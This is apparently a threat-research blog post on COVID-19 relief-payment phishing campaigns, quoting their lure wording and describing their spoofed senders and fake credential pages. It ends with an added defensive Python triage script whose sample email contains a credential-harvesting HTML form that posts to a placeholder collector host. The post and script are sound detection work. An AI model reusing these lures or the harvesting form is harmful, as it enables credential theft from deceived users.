Proofpoint researchers have observed an emerging trend of credential phishing and social engineering lures around COVID-19 financial relief. These campaigns use the promise of payments by global governments and businesses (specifically financial institutions) aimed at easing the economic impact of the ongoing pandemic to urge users to click links or download files.
In this credential phishing update on payment-themed fraud, we highlight a few examples of these campaigns, which target users in the U.S., the UK and Australia.
Government-Themed Attacks
Credential Phish: Trump Administration Covid-19 Check for Most Americans
Key Points: This medium-sized credential phish campaign primarily targeted U.S. healthcare and higher education organizations with a message claiming that the Trump administration is considering sending most American adults a check to help stimulate the economy. The email asks recipients to verify their email account through a malicious link that directs them to a phishing page.
Figure 1 US Payroll COVID-19 Relief Lure
Government-Themed Attacks Summary:
This medium-sized credential phishing campaign primarily targeted the United States and was largely sent to healthcare and higher education organizations. Secondary targeting for this campaign includes the technology industry, including information security companies. The messages are notable for their crude design: they contain clear grammar and usage errors, and the credential phishing page is a basic webpage clearly branded by a free website builder.
The email notes that “the Trump administration is considering sending most American adults a check for $1,000 as part of the efforts to stimulate the economy and help workers whose jobs have been disrupted by business closures because of the pandemic”.
Recipients are directed to verify their information for the “new payroll directory” by clicking the malicious link in the email.
If the recipient clicks the link, they are taken to the phishing page which asks for their domain\username, email address and password as shown in Figure 2.
Figure 2 US Payroll COVID-19 Relief Credential Phishing Page
Credential Phish: Australian Government Coronavirus/COVID-19 Tax Relief
Key Points: This campaign claims to be sent by a major Australian newspaper and uses subject lines such as "Government announces increased tax benefits in response to the Coronavirus." The messages contain a .PDF attachment with an embedded URL that leads to a OneDrive credential phishing page.
Figure 3 Australian COVID-19 Tax Benefit Lure
Credential Phish: Australian Government Summary:
The emails within this campaign claim to be delivered by a major newspaper in Australia. Figure 3 shows that they are actually sent from an address under the Romanian top-level domain, .ro. To appear authentic, the message includes supposed contact information for the paper and notes that they are “…happy to advise that we have now moved back to” the address provided. It’s notable that the address in the email does not match the newspaper being spoofed.
The email claims that the “Government has released its stimulus package in response to the Coronavirus outbreak” and encourages the recipient to open the malicious attachment for more details.
The attachment is an Adobe .PDF document with spoofed Microsoft OneDrive branding that informs users that “Your document is waiting for you” and encourages them to click the embedded link as shown in Figure 4.
Figure 4 Australian COVID-19 Tax Benefit Malicious Attachment
After clicking the link, the recipient is taken to a page that asks for their Microsoft OneDrive credentials.
Credential Phish: WHO-IMF “Relief Compensation” Steals Emails and Passwords
Key Points: This small email campaign targets technology and IT organizations with a subject line of "COVID 19 : Relief Compensation." It claims to come from the World Health Organization (WHO) and the International Monetary Fund (IMF), tells the recipient they have “been randomly selected to be compensated financially due to the outbreak of the COVID-19 Epidemic outbreak”, and carries a malicious Microsoft Excel-branded attachment that harvests email addresses and passwords.
Figure 5 Fake WHO and IMF Compensation Lure
WHO Credential Phish Summary:
This small email campaign targets technology and IT companies and arrives with a subject line of "COVID 19 : Relief Compensation." It claims to come from the World Health Organization (WHO) working with the International Monetary Fund (IMF). It tells the recipient that they have “been randomly selected to be compensated financially due to the outbreak of the COVID-19 Epidemic outbreak”. It goes on to say that the recipient will be “paid through our paying center in london [SIC] for your compensation payment from the International Monetary Fund Office treasury account.” To obtain these funds, the recipient is instructed to “view the attached file to print your winning confirmation.”
The attachment is a malicious HTML file titled "COVID18-COMPENSATION.html" (note the error: “COVID18” rather than “COVID19”). When the attachment is opened it displays a fake Microsoft Excel-branded page that asks for the recipient’s email address and password, as shown in Figure 6.
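As an added defensive example (not part of the Proofpoint report), the Python below triages a message for the two traits described in this post: an HTML attachment whose page contains a password field, as in the fake Excel lure, and the sender domain's top-level domain, which an analyst can compare against the brand the message claims, as with the .ro address behind the Australian newspaper spoof. The sample .eml, its domains, URLs and attachment name are constructed placeholders, not indicators from the report.

```python
import email
from email import policy
from html.parser import HTMLParser

# Constructed sample modelled on the HTML lure described above; the domains,
# addresses and filename are placeholders, not indicators from the report.
SAMPLE_EML = """\
From: "Relief Desk" <relief@news-desk.example.ro>
Subject: COVID 19 : Relief Compensation
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="COMPENSATION.html"

<html><body><h1>Microsoft Excel</h1>
<form method="post" action="https://collector.example.net/post.php">
<input type="email" name="email"><input type="password" name="pw"></form></body></html>
--b1--
"""

class FormScanner(HTMLParser):
    # Collect <input> types and <form> action URLs from an HTML attachment.
    def __init__(self):
        super().__init__()
        self.input_types, self.actions = set(), []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input":
            self.input_types.add((a.get("type") or "text").lower())
        elif tag == "form" and a.get("action"):
            self.actions.append(a["action"])

def triage(raw_eml):
    # One finding per HTML attachment that carries a password field.
    msg = email.message_from_string(raw_eml, policy=policy.default)
    sender_domain = msg["From"].addresses[0].domain.lower()
    findings = []
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        scanner = FormScanner()
        scanner.feed(part.get_content())
        if "password" in scanner.input_types:
            findings.append({"attachment": part.get_filename(),
                             "asks_email": bool({"email", "text"} & scanner.input_types),
                             "posts_to": scanner.actions,  # where entered credentials would be sent
                             "sender_tld": sender_domain.rsplit(".", 1)[-1]})  # e.g. "ro"
    return findings
```

Run `triage(SAMPLE_EML)` to get one finding naming the attachment, the form's submission URL and the sender TLD; a real deployment would feed it each inbound message's raw MIME.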